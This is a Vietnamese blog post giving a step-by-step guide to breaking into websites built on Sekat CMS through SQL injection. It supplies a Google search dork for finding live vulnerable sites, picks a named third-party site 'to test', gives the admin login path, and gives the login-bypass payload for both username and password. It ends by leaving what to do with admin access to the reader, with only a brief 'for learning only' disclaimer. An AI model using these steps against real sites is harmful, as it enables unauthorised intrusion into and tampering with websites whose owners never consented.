Bảo Mật

Hướng dẫn khai thác lỗ hổng của Sekat CMS

Sekat CMS hiện đang bị lỗ hổng SQL Injection, chỉ với một vài thủ thuật nhỏ, bạn có thể truy cập vào quyền quản trị Admin của Website, mà không cần phải tốn nhiều thời gian để khai thác.

Mình đi thẳng vào vấn đề luôn nhé

Bước 1: Tìm các Website sử dụng Sket CMS bằng Google

Nhập lệnh tìm kiếm dưới đây vào Google Search

intext:"Developed by Sekat Technologies" -site:https://cxsecurity.com

 

Hướng dẫn khai thác lỗ hổng của Sekat CMS 8

Bước 2: Chọn bất kỳ 1 Website được liệt kê trong Google

Mình sẽ chọn trang: http://unstccs.com để Test

Bước 3: Truy cập vào Weblogin Admin bằng Link dưới

http://tênwebiste.com/member_login.php

Cụ thể sẽ là:

Hướng dẫn khai thác lỗ hổng của Sekat CMS 9

Bước 4: Khai thác lỗi đăng nhập bằng điền UserPass như bên dưới:

Username: '=' 'or'
Password: '=' 'or'

Hướng dẫn khai thác lỗ hổng của Sekat CMS 10

Bước 5: Truy cập được vào quyền Admin, việc tiếp theo là của các bạn

Chỉ nên dùng để học tập, đừng phá người khác nhé

Hướng dẫn khai thác lỗ hổng của Sekat CMS 11

Đánh giá post

Rất Hữu ích

RatHuuIch là Website chia sẻ miễn phí tất cả các kiến thức về công nghệ thông tin. RatHuuIch cung cấp mọi giải pháp về mạng máy tính, phần mềm, đồ họa và MMO.

Bài liên quan

Theo dõi
Thông báo của
guest

0 Góp ý
Phản hồi nội tuyến
Xem tất cả bình luận
Check Also
Close
Back to top button